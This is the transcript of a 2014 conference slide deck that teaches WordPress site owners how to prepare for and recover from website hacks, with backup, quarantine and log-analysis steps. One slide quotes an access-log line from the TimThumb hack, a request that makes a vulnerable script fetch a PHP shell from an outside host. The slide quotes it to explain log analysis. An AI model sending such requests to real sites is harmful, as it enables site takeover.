Are you ready to be hacked?
29
ARE YOU READY TO BE HACKED? Daniel Kanchev @dvkanchev May 17th, 2014
-
Upload
daniel-kanchev -
Category
Technology
-
view
206 -
download
1
description
This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, assets evaluation and getting help from the right people that know WordPress and care about security.
Transcript of Are you ready to be hacked?
ARE YOU READY TO BE
HACKED?Daniel Kanchev @dvkanchev
May 17th, 2014
WHO AM I?
• 7+ Years of WordPress experience • 5 Years with SiteGround • Love FOSS • Security Freak • Addicted to extreme sports
Daniel Kanchev
IN THIS SESSION
• Why Should YOU Care
• Assets Evaluation
• Getting Help
• A KISS Disaster Recovery Plan
• Conclusion
WHY MEEEEEEEE ???
IN 2013, 61 % OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF OVER 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012!
+ 700 %Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
ATTAKS PER DAY
2010 2012 2013
570,000
464,000
190,000
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
ASSETS EVALUATION
MODULAR DESIGN
• Divide your site in logical components
• Allocate weight to all components
• Sort components based on criticality
EXAMPLE TABLE
Component Weight
WooCommerce plugin 4
Custom theme 3
Gallery plugin 2
Contact form 1
GETTING HELP
IDENTIFY WHO CAN HELP YOU
• The support team of your web host
• Plugin and theme developers
• Third party companies
• Security specialists
THE SUPPORT TEAM OF YOUR WEB HOST
• Website diagnostics
• Website backups and restores
• Log analysis
• WordPress core/plugin/theme upgrades
• Regular Security Audits
• Malware notifications and malicious code cleaning
PLUGIN AND THEME DEVELOPERS/SUPPORT
• New plugin/theme versions
• Security updates
• Migration to new versions of your themes/plugins
DISASTER RECOVERY PLAN
7 ”EASY” STEPS1. DON’T PANIC!
2. Create a copy of the hacked site + all logs
3. Quarantine your site
4. Remove the malicious code
5. Check the archived logs for the source of the attack
6. Resolve the security issues that caused the problem
7. “Unquarantine” your site
1. BACKUP YOUR HACKED SITE
1. mysqldump -uU -pP DB > yoursitefolder/DB.sql 2. tar zcvf backup.tar.gz yoursitefolder
How to backup:
Why to do this:
This is needed, so that you can later find outthe source of the attack/vulnerability!
USEFUL LOGS(on a cPanel server)
• /var/log/messages - FTP log for PureFTPd • /usr/local/apache/domlogs/DOMAIN.COM -
Apache access log • /var/log/exim_mainlog - Exim mail server
log • /usr/local/cpanel/logs/access_log - cPanel
File Manager log • /var/log/secure - SSH connections log
2. QUARANTINE YOUR SITE + CHANGE PASSWORDS
1. Protect your users and visitors 2. Disallow Google to access your hacked
site 3. Keep hackers away during the cleaning of
the site
USE .HTACESS MAGIC<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{REMOTE_ADDR} !^123\.56\.89\.12 RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f RewriteCond %{SCRIPT_FILENAME} !maintenance.html RewriteRule ^.*$ /maintenance.html [R=503,L] ErrorDocument 503 /maintenance.html Header Set RetryAfter "14400" Header Set CacheControl "maxage=0, nostore" </IfModule>
3. REMOVE THE MALICIOUS CODE
1. Restore the site from a clean backup
OR
2. Clean the affected files/database tables
4. ARCHIVED LOGS ANALYSIS
• Is complicated • Is time consuming • Requires advanced HTTP knowledge • Should be performed by security specialists
EXAMPLE - THE TIMTHUMB HACK
189.100.29.167 - [12/Apr/2014:06:53:41 +1000] “GET /wpcontent/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.ex l.ro/max/wp-mails.php HTTP/1.1ʹ′ʹ′ 301 – “-” “Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]”
189.100.29.167 - IP of the attacker. premiumtheme/timthumb.php - Vulnerable script. wp-mails.php - PHP shell script.
5. RESOLVE THE SECURITY ISSUES
• Upgrade WP core, plugins and themes • Upgrade server software if needed • Patch your code and use WAF in case there
are no upgrades available
6. UNQUARANTINE YOUR SITE + CHANGE PASSWORDS
• Remove the maintenance page • Inform users about the breach if needed • Keep an eye on your files/DB
CONCLUSION
• Web security is complicated! • Rely on partners to recover your site. • Be ready to manage the whole process. • Know your assets. • Make sure you have good security awareness. • Security is a journey - NOT a destination!
THANK YOU
